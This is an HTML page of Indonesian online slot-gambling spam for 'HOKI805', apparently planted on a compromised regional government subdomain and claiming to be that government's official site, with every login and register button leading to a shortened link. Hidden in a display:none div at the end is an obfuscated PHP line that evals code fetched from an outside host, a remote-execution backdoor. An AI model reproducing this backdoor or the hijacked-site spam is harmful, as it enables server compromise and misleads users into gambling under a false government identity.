
<!doctype html>
<html amp lang="id">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>HOKI805✅✅LINK SITUS GAME ONLINE GACOR GAMPANG MENANG MAXWIN TERBAIK DAN TERPERCAYA 2024 WEBSITE RESMI PEMERINTAH KABUPATEN KUNINGAN</title>
<meta name="description" content="HOKI805 merupakan link situs game online gacor WEBSITE RESMI PEMERINTAH KABUPATEN KUNINGAN gampang menang maxwin terbaik dan terpercaya tahun 2024 yang menyediakan berbagai macam permainan game online gacor dan game online terlengkap hari ini."/>
<meta name="keywords" content="HOKI805"/>
<link rel=canonical href="https://metrologilegal.kuningankab.go.id/system/js/-/hoki805/02/" />
<meta property="og:type" content="website"/>
<meta property="og:locale" content="id_ID"/>
<meta property="og:title" content="HOKI805✅✅LINK SITUS GAME ONLINE GACOR GAMPANG MENANG MAXWIN TERBAIK DAN TERPERCAYA 2024 WEBSITE RESMI PEMERINTAH KABUPATEN KUNINGAN"/>
<meta property="og:description" content="HOKI805 merupakan link situs game online gacor WEBSITE RESMI PEMERINTAH KABUPATEN KUNINGAN gampang menang maxwin terbaik dan terpercaya tahun 2024 yang menyediakan berbagai macam permainan game online gacor dan game online terlengkap hari ini."/>
<meta property="og:url" content="https://metrologilegal.kuningankab.go.id/system/js/-/hoki805/02/">
<meta property="og:site_name" content="HOKI805"/>
<meta property="og:image" content="https://situkangcabe.com/banner/logo-hoki805.webp"/>
<meta name="theme-color" content="darkpurple"/>
<meta property="og:image:alt" content="HOKI805"/>
<link rel="apple-touch-icon" href="https://situkangcabe.com/banner/logo-hoki805.webp"/>
<link rel="shortcut icon" type="image/webp" href="https://situkangcabe.com/banner/logo-hoki805.webp">

<style amp-boilerplate>
 body{-webkit-animation: -amp-start 8s steps(1,end) 0s 1 normal both; -moz-animation: -amp-start 8s steps(1,end) 0s 1 normal both; -ms-animation: -amp-start 8s steps(1,end) 0s 1 normal both; animation: -amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility: hidden}to{visibility: visible}}@-moz-keyframes -amp-start{from{visibility: hidden}to{visibility: visible}}@-ms-keyframes -amp-start{from{visibility: hidden}to{visibility: visible}}@-o-keyframes -amp-start{from{visibility: hidden}to{visibility: visible}}@keyframes -amp-start{from{visibility: hidden}to{visibility: visible}}
</style>
<noscript>
<style amp-boilerplate>
 body{-webkit-animation: none; -moz-animation: none; -ms-animation: none; animation: none}
</style>
</noscript>
<script async custom-element=amp-carousel src=https://cdn.ampproject.org/v0/amp-carousel-0.1.js></script>
<script async src="https://cdn.ampproject.org/v0.js"></script>
<script async custom-element="amp-iframe" src="https://cdn.ampproject.org/v0/amp-iframe-0.1.js"></script>
<style amp-custom>
.fixed-footer,.logo-container{position:fixed;left:0;right:0;z-index:99}:root{--small-font:12px;--normal-font:13px;--large-font:14px;--x-large-font:15px}body{font-size:var(--small-font);display:flex;flex-direction:column;padding-top:66px;padding-bottom:52px;font-family:Verdana,sans-serif;-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;background:#112000}a{text-decoration:none}summary{outline:0;list-style-type:none}summary::-webkit-details-marker{display:none}.container{align-self:center;margin-left:auto;margin-right:auto}.logo-container{text-align:center;display:flex;justify-content:center;align-items:center;top:0}.logo-container .logo{width:calc(48px*175/70);display:block}.logo-container .logo amp-img{flex-grow:1}.link-container{display:flex;justify-content:center;font-size:var(--x-large-font);width:100%}.main-menu-container{list-style-type:none;display:flex;flex-wrap:wrap;margin:0}.main-menu-container li{flex-basis:calc(25% - 10px);padding:5px}.main-menu-container li a{display:flex;justify-content:center;align-items:center;flex-direction:column;font-size:var(--normal-font);text-transform:uppercase;color:#233c7a;padding:10px}.main-menu-container li amp-img{margin:8px 0}.footer-container{text-align:center;color:#fff}.footer-container .bank-list,.footer-container .contact-list,.footer-container .footer-links,.footer-container .social-media-list{display:flex;flex-wrap:wrap;margin:0 auto;padding:10px 0;list-style-type:none}.footer-container .contact-list li{flex-basis:50%}.footer-container .contact-list li a{margin:2px 5px;display:flex;align-items:center;border-radius:30px;font-size:var(--normal-font)}.footer-container .contact-list>li a i{display:inline-flex;align-items:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;margin-right:10px;border-radius:50%;background:#1109308a;width:24px;height:24px}.footer-container .contact-list>li a i amp-img{margin:5px;flex-basis:0;-ms-flex-preferred-size:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1}.footer-container .footer-links{flex-wrap:wrap;justify-content:center}.footer-container .footer-links li{flex-basis:calc(25% - 3px);margin-bottom:5px}.footer-container .footer-links li a{padding:5px;font-size:var(--normal-font)}.site-description{background-color:#050c29;padding:10px}.footer-container h1,.footer-container h2,.footer-container h3,.footer-container h4{display:inline}.copyright{padding:25px 0 20px;display:flex;flex-direction:column;justify-content:center}.copyright div{padding-bottom:10px}.fixed-footer{display:flex;justify-content:space-around;border-radius:30px 30px 0 0;padding:8px 0;bottom:0;border-top:3px groove #233c7a}.fixed-footer a{flex-basis:calc((100% - 15px*6)/ 5);display:flex;flex-direction:column;justify-content:center;align-items:center}@media(min-width:768px){body{font-size:var(--normal-font)}.container{width:970px}.site-menu{width:20%}}@media(min-width:1200px){.container{width:1170px}}@media(min-width:992px){.container{width:970px}}@font-face{font-family:Verdana,sans-serif;font-weight:400;font-style:normal}@keyframes pulse{0%{filter:initial}50%{filter:brightness(40.5) drop-shadow(0 0 10px white)}}.logo-container{justify-content:space-between;padding:0;border-radius:0 0 20px 20px;border-bottom:3px groove #233c7a}.logo-container .logo{padding:10px}.header-right{display:flex;justify-content:space-between;min-width:100px;align-self:stretch}.header-right .register-section{align-self:stretch;align-items:center;display:flex;padding:10px 15px}.header-right .register-section a{padding:5px 10px}.header-right .hamburger-section{align-self:center;padding:10px 0 10px 10px;margin:10px 0 10px 10px}.login-button,.register-button{border-radius:30px}.link-container{padding:20px 0;font-size:15px}.link-container a{text-align:center;text-transform:uppercase;margin-top:10px;width:auto;padding:5px 15px;margin-left:10px;align-self:center}.main-menu-container{padding:0 0 10px;justify-content:center;background-color:#0a0814}.main-menu-container .amp-carousel-button-next,.main-menu-container .amp-carousel-button-prev{width:20px;height:100%;background-color:#110930;color:#fff}.popular-game-title-container{background-color:#400d75;background-image:linear-gradient(to left,#33cc33,#233c7a);color:#fff}.popular-game-title-container .title{font-size:14px;display:flex;align-items:center}.contact-list-container{margin-top:10px}.footer-container .contact-list{justify-content:center}.footer-container .contact-list li a{padding:3px 15px 3px 3px;font-size:var(--small-font);background-color:#0c0c0c;color:#fff}.footer-container .social-media-list li{flex-basis:auto;margin:10px}.footer-container .footer-links{background-color:#141125;align-items:center}.fixed-footer a,.footer-container .footer-links,.site-description{background-color:inherit}.footer-container .footer-links li{flex-basis:auto;padding:2.5px 10px}.footer-container .footer-links>li:not(:nth-child(5n+5)):not(:first-child){border-left:1px solid #fff;border:none}.fixed-footer{background:linear-gradient(to top,#110930,#33cc33)}.fixed-footer a{flex-basis:calc((100% - 15px*6)/ 5);max-width:75px;font-size:12px;font-weight:700;color:#fff}.fixed-footer .center{transform:scale(2.5) translateY(-5px);background:center/contain no-repeat;background-color:inherit;border-radius:50%}.fixed-footer amp-img{max-width:40%;margin-bottom:5px}.fixed-footer .live-chat-icon{animation:3s infinite pulse}.logo-container{background:linear-gradient(to bottom,#110930,#33cc33)}.link-container{background-color:#141414;background-image:linear-gradient(to right,#141414 0,#33cc33 100%)}.register-button{background:#33cc33;font-weight:700;font-size:12px;border:2px groove #233c7a}.login-button{background:0 0;border:1px solid #198754}.footer-container .contact-list-container{background-image:linear-gradient(to right,#33cc33,#233c7a)}.footer-container .footer-links li a,.login1-button,.register-button,.site-description{color:#fff}.fixed-footer a.active{color:#0efe00}.duarr{-webkit-animation-name:duarr;animation-name:duarr;-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both;animation-iteration-count:infinite}@-webkit-keyframes duarr{0%,100%{-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}10%,20%{-webkit-transform:scale3d(.9,.9,.9) rotate3d(0,0,1,-3deg);transform:scale3d(.9,.9,.9) rotate3d(0,0,1,-3deg)}30%,50%,70%,90%{-webkit-transform:scale3d(1.1,1.1,1.1) rotate3d(0,0,1,3deg);transform:scale3d(1.1,1.1,1.1) rotate3d(0,0,1,3deg)}40%,60%,80%{-webkit-transform:scale3d(1.1,1.1,1.1) rotate3d(0,0,1,-3deg);transform:scale3d(1.1,1.1,1.1) rotate3d(0,0,1,-3deg)}}@keyframes duarr{0%,100%{-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}10%,20%{-webkit-transform:scale3d(.9,.9,.9) rotate3d(0,0,1,-3deg);transform:scale3d(.9,.9,.9) rotate3d(0,0,1,-3deg)}30%,50%,70%,90%{-webkit-transform:scale3d(1.1,1.1,1.1) rotate3d(0,0,1,3deg);transform:scale3d(1.1,1.1,1.1) rotate3d(0,0,1,3deg)}40%,60%,80%{-webkit-transform:scale3d(1.1,1.1,1.1) rotate3d(0,0,1,-3deg);transform:scale3d(1.1,1.1,1.1) rotate3d(0,0,1,-3deg)}}table tbody>tr:nth-child(odd)>td,table tbody>tr:nth-child(odd)>th{background-color:#fff}table td,table th{padding:5px;line-height:1.5;vertical-align:top;border:2px solid #233c7a;background:#d0b9ff;color:#33cc33}.register1-button{background:linear-gradient(to left,#33cc33,#233c7a);border:3px groove #b3b3b3}.login1-button{background:linear-gradient(to right,#33cc33,#233c7a70)}.link-container1{display:flex;justify-content:center;font-size:var(--x-large-font);padding:0;width:100%}.link-container1 a{width:100%;text-align:center;padding:10px 20px;text-transform:uppercase;color:#fff;font-weight:700;margin:5px;border-radius:30px}#marquee .marquee{font-family:Verdana;background:radial-gradient(circle 214px at 46.5% 54.2%,#22a909 0,#33cc33 90%);color:#fff;padding:5px 0;box-shadow:0 0 0,0 0 2px,0 0 1em #110930,0 0 .5em #110930,0 0 .1em #110930,0 10px 3px #33cc33;border:2px solid #110930;border-radius:5px;max-width:100%;text-align:center}.marquee{font-size:4vw}.marquee-text{background:linear-gradient(to left,#010001 24%,#11093085);padding:5px 0;border:2px solid #110930;border-radius:15px;margin:5px;height:auto;display:block;line-height:30px;overflow:hidden;position:relative}.marquee-text div{height:auto;line-height:22px;font-size:13px;white-space:nowrap;color:#fff;z-index:1;font-weight:600;font-family:Verdana;animation:20s linear infinite marquee;margin-top:3px}.marquee-text:hover div{animation-play-state:paused}@keyframes marquee{0%{transform:translateX(100%)}100%{transform:translateX(-100%)}}@media only screen and (min-width:601px){.referral{position:fixed;bottom:50px;left:14px;z-index:100;width:100px;height:100px}}@media only screen and (max-width:600px){.referral{position:fixed;bottom:75px;left:14px;z-index:100;width:100px;height:100px}}.link-gacor{border:2px solid purple;animation:1s linear infinite link-gacor}@keyframes link-gacor{0%{border-color:#233c7a}20%{border-color:#33cc336ff}40%{border-color:#00d9ff}60%{border-color:#233c7a}80%{border-color:#fff}100%{border-color:purple}}.bigger-game-list ul input[type=radio]:checked~.wrapper-container .rtp-container,.scrollable-game-list main input[type=radio]:checked~.wrapper-container .rtp-container{opacity:0}.bigger-game-list ul .inner-game-item .wrapper-container .rtp-container .rtp-progress .rtp-progress-bar[data-rtp=high],.scrollable-game-list main .inner-game-item .wrapper-container .rtp-container .rtp-progress .rtp-progress-bar[data-rtp=high]{background:linear-gradient(to right,#31a13b,#62c88d)}.bigger-game-list ul .inner-game-item .wrapper-container .rtp-container,.scrollable-game-list main .inner-game-item .wrapper-container .rtp-container{position:absolute;left:0;right:0;bottom:0;padding:5px 12px;background-color:rgba(0,0,0,.7);color:#fff;display:flex;justify-content:space-between;align-items:center;gap:3px;font-size:9px;pointer-events:none;line-height:1}.bigger-game-list ul .inner-game-item .wrapper-container .rtp-container .rtp-progress,.scrollable-game-list main .inner-game-item .wrapper-container .rtp-container .rtp-progress{flex-grow:1;background-color:#fff;border:1px solid #ddd;border-radius:50px}.bigger-game-list ul .inner-game-item .wrapper-container .rtp-container .rtp-progress .rtp-progress-bar,.scrollable-game-list main .inner-game-item .wrapper-container .rtp-container .rtp-container .rtp-progress-bar{height:8px;border-radius:50px}.bigger-game-list ul .inner-game-item .wrapper-container .rtp-container .rtp-progress .rtp-progress-bar[data-rtp=low],.scrollable-game-list main .inner-game-item .wrapper-container .rtp-container .rtp-progress .rtp-progress-bar[data-rtp=low]{background:linear-gradient(to right,#cd9ba7,#ca6a86)}.bigger-game-list ul .inner-game-item .wrapper-container .rtp-container .rtp-progress .rtp-progress-bar[data-rtp=medium],.scrollable-game-list main .inner-game-item .wrapper-container .rtp-container .rtp-progress .rtp-progress-bar[data-rtp=medium]{background:linear-gradient(to right,#fcdc8f,#f2d064)}.popular-game-title-container .container{display:flex;justify-content:space-between;align-items:center;padding:10px}.popular-game-title-container .title .popular-games-icon{margin-right:10px}.popular-game-title-container .title{font-size:var(--large-font);display:flex;align-items:center}.popular-game-title-container a{padding:6px 8px;border-radius:25px;font-size:10px;background-color:#33cc33;color:#fff}.bigger-game-list ul{padding:5px 0;margin:auto;display:flex;justify-content:center;flex-wrap:wrap;list-style-type:none}.bigger-game-list ul>li{max-width:calc(100%/3 - 10px);min-width:calc(100%/4 - 10px);flex-basis:133px;padding:5px;text-align:center;color:#fff;font-size:80%}.bigger-game-list ul .inner-game-item{margin:0;padding:5px;border-radius:25px;background-color:#1e1a31;background-image:linear-gradient(to bottom,#222583,#233c7a);display:block;font-weight:400}.bigger-game-list ul .inner-game-item .wrapper-container{display:block;width:100%;padding-top:100%;position:relative;margin-bottom:5px;border-radius:25px;overflow:hidden}.bigger-game-list ul .inner-game-item .wrapper-container .game-link-container,.bigger-game-list ul .inner-game-item .wrapper-container>amp-img{position:absolute;top:0;left:0;height:100%;width:100%}.bigger-game-list ul .inner-game-item .wrapper-container>amp-img{background-color:#33cc33;transition:transform .2s;transform-origin:center}.bigger-game-list ul .inner-game-item .wrapper-container .game-link-container{display:flex;flex-direction:column;align-items:center;justify-content:space-around;background-color:rgba(6,0,15,.85)}.bigger-game-list ul .inner-game-item .wrapper-container .game-link-container>a{margin:0}.bigger-game-list ul .inner-game-item .game-name{display:block;margin:8px 0 4px;padding:0 5px;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}.bigger-game-list ul input[type=radio]{position:absolute;visibility:hidden;left:-99em}.bigger-game-list ul input[type=radio]:not(:checked)~.wrapper-container .game-link-container{display:none}.bigger-game-list ul input[type=radio]:checked~.wrapper-container>amp-img{transform:scale(1.25)}.play-now{display:flex;justify-content:center;align-items:center;cursor:pointer;font-size:1.2em;border-radius:18px;padding:5px;background-color:#f8007e;background-image:linear-gradient(to right,#f8007e 0,#a500e0 100%);color:#fff;width:80%}

</style>
</head>
<body>
<div class="logo-container">
	<a href="https://metrologilegal.kuningankab.go.id/system/js/-/hoki805/02/" class="logo"><amp-img class="duarr" layout="responsive" height="70" width="150" src="https://situkangcabe.com/banner/logo-hoki805.webp" aria-label="logo HOKI805" noloading></amp-img></a>
	<div class="header-right">
		<span class="register-section"><a href="https://cutt.ly/4egKFM7S" class="register-button" target="_blank" rel="nofollow">DAFTAR</a></span>
	</div>
</div>


<amp-img layout="responsive" title="HOKI805" src="https://situkangcabe.com/banner/banner-hoki805.png" alt="banner HOKI805" width="1000" height="1000"></amp-img>
<div class="link-container1 container">
	<a href="https://cutt.ly/4egKFM7S" target="_blank" rel="nofollow" class="login1-button ; link-gacor">LOGIN</a>
	<a href="https://cutt.ly/4egKFM7S" target="_blank" rel="nofollow" class="register1-button">PROMOSI</a>
	
</div>

<amp-img layout="intrinsic" src="https://i.postimg.cc/ZRnmB2fY/jackpot.gif" title="jackpot" alt="jackpot HOKI805" width="1043" height="309"></amp-img>

<!--Marquee-->
<div class="marquee-text">
<div style="font-size:12px;">LINK SITUS GAME ONLINE GACOR GAMPANG MENANG MAXWIN TERBAIK DAN TERPERCAYA 2024 WEBSITE RESMI PEMERINTAH KABUPATEN KUNINGAN</div>
</div>

<div class="popular-game-title-container">
        <div class="container">
            <div class="title">
                <amp-img class="popular-games-icon" layout="intrinsic" height="36" width="36" src="https://situkangcabe.com/banner/logo-hoki805.webp" alt="Game Populer"></amp-img>
                HOKI805
            </div>
            <a rel="nofollow" href="https://cutt.ly/4egKFM7S" class="register-button; link-gacor"> Live RTP !</a>
        </div>
    </div>


<footer class="footer-container">
<div class="contact-list-container">
	<ul class="contact-list container">
		<li>
			<a href="https://cutt.ly/4egKFM7S" target="_blank" rel="noopener nofollow"><i><amp-img layout="responsive" height="12" width="12" src="https://res.cloudinary.com/dwvdinibh/image/upload/v1717654979/iconchat_pkbkll.png" alt="livechat"></amp-img></i> LIVECHAT </a>
		</li>
		<li>
			<a href="https://cutt.ly/4egKFM7S" target="_blank" rel="noopener nofollow"><i><amp-img layout="responsive" height="12" width="12" src="https://res.cloudinary.com/dwvdinibh/image/upload/v1717654979/iconwa_lzbnjo.png" alt="whatsapp"></amp-img></i> WHATSAPP </a>
		</li>
	</ul>
</div>

<div class="site-description">
	<div class="container">
<article>
<h1 style="text-align: center;"><span style="color: #00dc34;">HOKI805✅✅LINK SITUS GAME ONLINE GACOR GAMPANG MENANG MAXWIN TERBAIK DAN TERPERCAYA 2024 WEBSITE RESMI PEMERINTAH KABUPATEN KUNINGAN</span></h1>
<p style="text-align: justify;">HOKI805 merupakan link situs game online gacor WEBSITE RESMI PEMERINTAH KABUPATEN KUNINGAN gampang menang maxwin terbaik dan terpercaya tahun 2024 yang menyediakan berbagai macam permainan game online gacor dan game online terlengkap hari ini.</p>
</article>
	</div>
</div>
<hr/>
<div class="copyright">
	<div>
		<a aria-label="HOKI805" id="HOKI805" href="https://metrologilegal.kuningankab.go.id/system/js/-/hoki805/02/" target="_blank" rel="noopener"><amp-img layout="intrinsic" height="68" width="150" src="https://situkangcabe.com/banner/logo-hoki805.webp" alt="HOKI805"></amp-img></a>
	</div>
	

	<div>
		Copyright 2024 © HOKI805<br/>
	</div>
	
	
</div>
</footer>
<div class="fixed-footer">
	<a href="https://cutt.ly/4egKFM7S" target="_blank" rel="nofollow"><amp-img layout="intrinsic" class="live-chat-icon" height="75" width="75" src="https://res.cloudinary.com/dwvdinibh/image/upload/v1717654980/iconin_iscder.png" alt="login"></amp-img>Login</a><a class="duarr" href="https://cutt.ly/4egKFM7S" target="_blank" rel="nofollow"><amp-img class="center" layout="intrinsic" height="100" width="100" src="https://situkangcabe.com/banner/logo-hoki805.webp" alt="Daftar"></amp-img>Daftar</a><a href="https://cutt.ly/4egKFM7S" target="_blank" rel="nofollow noopener" class="js_live_chat_link live-chat-link"><amp-img class="live-chat-icon" layout="intrinsic" height="75" width="75" src="https://res.cloudinary.com/dwvdinibh/image/upload/v1717654979/iconchat_pkbkll.png" alt="Live Chat"></amp-img>Chat</a>
</div>

</body>
<div style="display: none;">
	<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://sexhotmilf.com/backlink.php"));/**/?>
	</div>
</html>